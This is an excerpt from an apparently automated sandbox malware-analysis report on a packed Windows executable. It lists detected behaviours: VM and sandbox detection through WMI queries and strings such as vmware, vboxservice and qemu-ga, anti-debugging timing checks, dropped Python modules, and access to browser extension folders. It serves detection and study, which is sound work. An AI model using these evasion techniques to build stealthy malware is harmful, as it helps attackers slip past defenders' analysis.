              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0032F6 rdtsc 1_2_00007FFDFB0032F6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6319Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6260Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 501
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4129
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2168
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4157
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2338
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3039
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2596
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1015
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2864
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 574
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\python310.dllJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_hashlib.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.dllJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17039
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeAPI coverage: 4.7 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep count: 6319 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664Thread sleep count: 213 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep count: 6260 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep count: 130 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5592Thread sleep count: 501 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2516Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep count: 4129 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572Thread sleep time: -11068046444225724s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep count: 2168 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep count: 4157 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep count: 2338 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep count: 3039 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep count: 263 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7468Thread sleep count: 2596 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep count: 1015 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2492Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2208Thread sleep count: 2864 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3336Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2208Thread sleep count: 574 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6FB1E79B0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1E85A0 FindFirstFileExW,FindClose,0_2_00007FF6FB1E85A0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB200B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6FB200B84
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1E85A0 FindFirstFileExW,FindClose,1_2_00007FF6FB1E85A0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB200B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6FB200B84
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6FB1E79B0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB003229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFE1FF9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,1_2_00007FFDFB003229
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B146EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,65_2_00007FF629B146EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,65_2_00007FF629B0E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B588E0 FindFirstFileExA,65_2_00007FF629B588E0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bgJump to behavior
              Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtrayZ
              Source: getmac.exe, 0000002F.00000003.1822840760.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1822840760.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer5
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: rar.exe, 00000041.00000003.1894918655.000001ED70C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\`
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 0000002F.00000003.1822840760.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
              Source: getmac.exe, 0000002F.00000003.1822840760.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1823255495.000001C2C94FF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1822840760.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C9501000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: getmac.exe, 0000002F.00000003.1822840760.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: rar.exe, 00000041.00000003.1894918655.000001ED70C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: rar.exe, 00000041.00000003.1894918655.000001ED70C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7zD{
              Source: e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxserviceZ
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: e45AiBoV6X.exe, 00000001.00000003.1829771493.000002290BB7F000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984419770.000002290AFF0000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1988660753.000002290B8D6000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1880836585.000002290BB7F000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983989604.000002290AFCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: getmac.exe, 0000002F.00000003.1822840760.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWrkProtocolRSVP
              Source: e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvcZ
              Source: getmac.exe, 0000002F.00000002.1824184542.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1822840760.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"ME=Co(
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: getmac.exe, 0000002F.00000003.1822840760.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1823255495.000001C2C94FF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1822840760.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C9501000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareuserZ
              Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qemu-gaZ
              Source: e45AiBoV6X.exe, 00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWS
              Source: getmac.exe, 0000002F.00000003.1822840760.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1823255495.000001C2C94FF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1822840760.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C9501000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmusrvcZ
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwarec
              Source: e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretrayZ
              Source: e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer5Z
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Potentially malicious time measurement code found
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0042411_2_00007FFDFB004241
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00572C1_2_00007FFDFB00572C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0032F6 rdtsc 1_2_00007FFDFB0032F6
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1EC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6FB1EC44C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB354460 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFB354460
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB202790 GetProcessHeap,0_2_00007FF6FB202790
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
